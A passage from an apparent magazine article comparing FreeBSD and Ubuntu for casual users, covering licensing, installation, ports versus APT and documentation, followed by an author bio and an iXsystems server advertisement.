and services that should be started at system boot up. 

FreeBSD is licensed under the BSD license. This is 
unrestrictive and gives freedom in a way that if an individual 
or an organization used, improved, or modified your code, 
and made a proprietary software from it, the individual or 
organization may or may not credit you. In my personal 
view, this is true freedom. Ubuntu on the other hand is 
licensed mostly under the GPL, which is very restrictive. It 
preserves and protects the openness of the software. 

As for the base installation, in my experience, FreeBSD 
installs faster than the base installation of Ubuntu 
Server. The formatting of partitions in FreeBSD is faster 
than Ubuntu (my personal experience again). In terms 
of software installation, you can choose a variety of 
methods using FreeBSD. My favorite of them all is the 
ports collection, which requires you to be patient and more 
patient when you install. You can also use packages (not 
as complete as the ports collection) and compile sources. 
In Ubuntu, you use the APT system, dpkg packages, and 
you can also compile sources. 

The documentation for FreeBSD is so complete that you 
will be able to learn a lot of stuff from the OS itself, shells, TCP/ 
IP, and network services. I think Ubuntu's documentation is 
good too, but not as close as the FreeBSD handbook. Using 
and learning FreeBSD with the help of the handbook and the 
very supportive members of the FreeBSD Forum at http:// 
forums.freebsd.org give a new user the experience of learning 
the ins and outs of an operating system in a deeper way. 

If you want to learn an operating system from the 
internals up to the applications, I would strongly 
recommend FreeBSD for you. You may not be able to do 
things as easily as you expect. You will need a lot 
of patience and a couple of hours for software compilation 
(should you choose the ports collection). The learning 
you will gain is worthwhile and you will have a deeper 
understanding of a complete operating system. 

In short, the difference between FreeBSD and Ubuntu 
is in the internals, kernel, startup scripts, ways of software 
installation including management and most system 
utilities and tools. The software and applications they use 
are both free and open source software (FOSS), which 
means gnome is gnome, kde is kde, firefox is firefox, for 
both FreeBSD and Ubuntu. 

As promised, I did not write things that may or will start a 
flame war. I did my best to be honest, fair, and unbiased in 
discussing the difference between FreeBSD and Ubuntu in a 
not so technical way, but from the point of view of a casual user. 


JOSHUA EBARVIA 

Joshua Ebarvia is a java programmer, systems administrator 
and college lecturer. His passion is working and using operating 
systems specially UNIX-based and UNIX-cloned systems. You can 
reach him at joshua.ebarvia@gmail.com 
Served Exactly How You Like! 


Tired of being able to choose from only chocolate, strawberry, 
or vanilla? At iXsystems, we understand your need for custom- 
made servers. 


“Open Source Hardware Design” is the iXsystems trademark. iXsystems provides an 
assortment of pre-configured servers and storage solutions, but our true pride rests on 
our ability to customize our products to meet your specific tastes and needs. iXsystems 
mixes in the raw power of Intel® Xeon® 5600/5500 Series Processors for a truly delicious 
treat. Our Professional Enterprise Service Level packages and desktop support offering 
also enables us to ensure you get the most from your FreeBSD® and PC-BSD™ systems, 
adding the perfect toppings to your order. 


Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


Powerful. 
Intelligent. 


Intel, the Intel logo, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and other countries. 